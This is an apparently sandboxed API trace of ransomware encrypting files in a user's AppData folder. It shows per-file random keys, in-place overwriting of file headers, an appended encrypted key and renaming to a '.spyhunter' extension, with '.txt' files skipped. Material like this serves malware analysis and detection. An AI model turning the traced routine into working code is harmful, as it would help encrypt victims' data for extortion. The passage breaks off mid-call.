HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08af8 | out: hHeap=0x2c0000) returned 1 [0150.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed98 | out: pbBuffer=0x57ed98) returned 1 [0150.109] GetProcessHeap () returned 0x2c0000 [0150.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.110] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed90*=0x30) returned 1 [0150.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z5asPd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z5aspd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.110] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z5asPd.pptx") returned 61 [0150.110] StrStrW (lpFirst="Z5asPd.pptx", lpSrch=".txt") returned 0x0 [0150.110] GetProcessHeap () returned 0x2c0000 [0150.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0150.110] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed54*=0x2800, lpOverlapped=0x0) returned 1 [0150.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.111] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed54*=0x2800, lpOverlapped=0x0) returned 1 [0150.111] GetProcessHeap () returned 0x2c0000 [0150.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0150.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.111] WriteFile (in: hFile=0x178, lpBuffer=0x57ed94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x57ed94*, lpNumberOfBytesWritten=0x57ed54*=0x4, lpOverlapped=0x0) returned 1 [0150.111] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed54*=0x30, lpOverlapped=0x0) returned 1 [0150.112] CloseHandle (hObject=0x178) returned 1 [0150.268] GetProcessHeap () returned 0x2c0000 [0150.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.268] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z5asPd.pptx.spyhunter") returned 71 [0150.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z5asPd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z5aspd.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z5asPd.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z5aspd.pptx.spyhunter")) returned 1 [0150.269] GetProcessHeap () returned 0x2c0000 [0150.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.270] GetProcessHeap () returned 0x2c0000 [0150.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.270] GetProcessHeap () returned 0x2c0000 [0150.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85a00 | out: hHeap=0x2c0000) returned 1 [0150.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed98 | out: pbBuffer=0x57ed98) returned 1 [0150.270] GetProcessHeap () returned 0x2c0000 [0150.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed90*=0x30) returned 1 [0150.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xodNCLBV6jX5OD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xodnclbv6jx5od.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.271] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xodNCLBV6jX5OD.rtf") returned 68 [0150.271] StrStrW (lpFirst="xodNCLBV6jX5OD.rtf", lpSrch=".txt") returned 0x0 [0150.271] GetProcessHeap () returned 0x2c0000 [0150.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.271] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed54*=0x2800, lpOverlapped=0x0) returned 1 [0150.272] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.272] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed54*=0x2800, lpOverlapped=0x0) returned 1 [0150.272] GetProcessHeap () returned 0x2c0000 [0150.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.272] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.272] WriteFile (in: hFile=0x178, lpBuffer=0x57ed94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x57ed94*, lpNumberOfBytesWritten=0x57ed54*=0x4, lpOverlapped=0x0) returned 1 [0150.272] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed54*=0x30, lpOverlapped=0x0) returned 1 [0150.272] CloseHandle (hObject=0x178) returned 1 [0150.273] GetProcessHeap () returned 0x2c0000 [0150.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.273] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xodNCLBV6jX5OD.rtf.spyhunter") returned 78 [0150.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xodNCLBV6jX5OD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xodnclbv6jx5od.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xodNCLBV6jX5OD.rtf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xodnclbv6jx5od.rtf.spyhunter")) returned 1 [0150.274] GetProcessHeap () returned 0x2c0000 [0150.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.274] GetProcessHeap () returned 0x2c0000 [0150.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.274] GetProcessHeap () returned 0x2c0000 [0150.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81468 | out: hHeap=0x2c0000) returned 1 [0150.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed90 | out: pbBuffer=0x57ed90) returned 1 [0150.274] GetProcessHeap () returned 0x2c0000 [0150.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed88*=0x30) returned 1 [0150.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WUqQDHQRt8tDLmW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuqqdhqrt8tdlmw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.275] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WUqQDHQRt8tDLmW.jpg") returned 69 [0150.275] StrStrW (lpFirst="WUqQDHQRt8tDLmW.jpg", lpSrch=".txt") returned 0x0 [0150.275] GetProcessHeap () returned 0x2c0000 [0150.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.275] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0150.276] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.276] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0150.276] GetProcessHeap () returned 0x2c0000 [0150.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.276] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.276] WriteFile (in: hFile=0x178, lpBuffer=0x57ed8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x57ed8c*, lpNumberOfBytesWritten=0x57ed4c*=0x4, lpOverlapped=0x0) returned 1 [0150.276] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed4c*=0x30, lpOverlapped=0x0) returned 1 [0150.276] CloseHandle (hObject=0x178) returned 1 [0150.276] GetProcessHeap () returned 0x2c0000 [0150.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.277] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WUqQDHQRt8tDLmW.jpg.spyhunter") returned 79 [0150.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WUqQDHQRt8tDLmW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuqqdhqrt8tdlmw.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WUqQDHQRt8tDLmW.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuqqdhqrt8tdlmw.jpg.spyhunter")) returned 1 [0150.278] GetProcessHeap () returned 0x2c0000 [0150.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.278] GetProcessHeap () returned 0x2c0000 [0150.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.278] GetProcessHeap () returned 0x2c0000 [0150.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81390 | out: hHeap=0x2c0000) returned 1 [0150.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed90 | out: pbBuffer=0x57ed90) returned 1 [0150.278] GetProcessHeap () returned 0x2c0000 [0150.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.278] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed88*=0x30) returned 1 [0150.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wnau0N5uEWtteCiA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wnau0n5uewttecia.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wnau0N5uEWtteCiA.mkv") returned 70 [0150.279] StrStrW (lpFirst="wnau0N5uEWtteCiA.mkv", lpSrch=".txt") returned 0x0 [0150.279] GetProcessHeap () returned 0x2c0000 [0150.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.279] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0150.280] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.280] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0150.280] GetProcessHeap () returned 0x2c0000 [0150.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.280] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.280] WriteFile (in: hFile=0x178, lpBuffer=0x57ed8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x57ed8c*, lpNumberOfBytesWritten=0x57ed4c*=0x4, lpOverlapped=0x0) returned 1 [0150.280] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed4c*=0x30, lpOverlapped=0x0) returned 1 [0150.280] CloseHandle (hObject=0x178) returned 1 [0150.281] GetProcessHeap () returned 0x2c0000 [0150.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.281] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wnau0N5uEWtteCiA.mkv.spyhunter") returned 80 [0150.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wnau0N5uEWtteCiA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wnau0n5uewttecia.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wnau0N5uEWtteCiA.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wnau0n5uewttecia.mkv.spyhunter")) returned 1 [0150.282] GetProcessHeap () returned 0x2c0000 [0150.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.282] GetProcessHeap () returned 0x2c0000 [0150.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.282] GetProcessHeap () returned 0x2c0000 [0150.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c812b8 | out: hHeap=0x2c0000) returned 1 [0150.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed88 | out: pbBuffer=0x57ed88) returned 1 [0150.282] GetProcessHeap () returned 0x2c0000 [0150.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed80*=0x30) returned 1 [0150.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wLhIWljPYFpWybLQO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wlhiwljpyfpwyblqo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wLhIWljPYFpWybLQO.wav") returned 71 [0150.283] StrStrW (lpFirst="wLhIWljPYFpWybLQO.wav", lpSrch=".txt") returned 0x0 [0150.283] GetProcessHeap () returned 0x2c0000 [0150.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.283] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed44*=0x2800, lpOverlapped=0x0) returned 1 [0150.284] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.284] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed44*=0x2800, lpOverlapped=0x0) returned 1 [0150.284] GetProcessHeap () returned 0x2c0000 [0150.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.284] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.284] WriteFile (in: hFile=0x178, lpBuffer=0x57ed84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x57ed84*, lpNumberOfBytesWritten=0x57ed44*=0x4, lpOverlapped=0x0) returned 1 [0150.284] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed44*=0x30, lpOverlapped=0x0) returned 1 [0150.285] CloseHandle (hObject=0x178) returned 1 [0150.285] GetProcessHeap () returned 0x2c0000 [0150.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.285] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wLhIWljPYFpWybLQO.wav.spyhunter") returned 81 [0150.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wLhIWljPYFpWybLQO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wlhiwljpyfpwyblqo.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wLhIWljPYFpWybLQO.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wlhiwljpyfpwyblqo.wav.spyhunter")) returned 1 [0150.286] GetProcessHeap () returned 0x2c0000 [0150.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.286] GetProcessHeap () returned 0x2c0000 [0150.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.286] GetProcessHeap () returned 0x2c0000 [0150.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81108 | out: hHeap=0x2c0000) returned 1 [0150.286] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed88 | out: pbBuffer=0x57ed88) returned 1 [0150.286] GetProcessHeap () returned 0x2c0000 [0150.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed80*=0x30) returned 1 [0150.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WG9dfvuK7T2t.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wg9dfvuk7t2t.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WG9dfvuK7T2t.csv") returned 66 [0150.287] StrStrW (lpFirst="WG9dfvuK7T2t.csv", lpSrch=".txt") returned 0x0 [0150.287] GetProcessHeap () returned 0x2c0000 [0150.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.287] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed44*=0x2800, lpOverlapped=0x0) returned 1 [0150.288] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.288] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed44*=0x2800, lpOverlapped=0x0) returned 1 [0150.288] GetProcessHeap () returned 0x2c0000 [0150.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.288] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.288] WriteFile (in: hFile=0x178, lpBuffer=0x57ed84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x57ed84*, lpNumberOfBytesWritten=0x57ed44*=0x4, lpOverlapped=0x0) returned 1 [0150.288] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed44*=0x30, lpOverlapped=0x0) returned 1 [0150.289] CloseHandle (hObject=0x178) returned 1 [0150.289] GetProcessHeap () returned 0x2c0000 [0150.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.289] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WG9dfvuK7T2t.csv.spyhunter") returned 76 [0150.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WG9dfvuK7T2t.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wg9dfvuk7t2t.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WG9dfvuK7T2t.csv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wg9dfvuk7t2t.csv.spyhunter")) returned 1 [0150.290] GetProcessHeap () returned 0x2c0000 [0150.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.290] GetProcessHeap () returned 0x2c0000 [0150.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.290] GetProcessHeap () returned 0x2c0000 [0150.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08958 | out: hHeap=0x2c0000) returned 1 [0150.290] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed80 | out: pbBuffer=0x57ed80) returned 1 [0150.290] GetProcessHeap () returned 0x2c0000 [0150.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.290] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed78*=0x30) returned 1 [0150.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T3ARcWqVyHfQXY.m4a" (normalized: 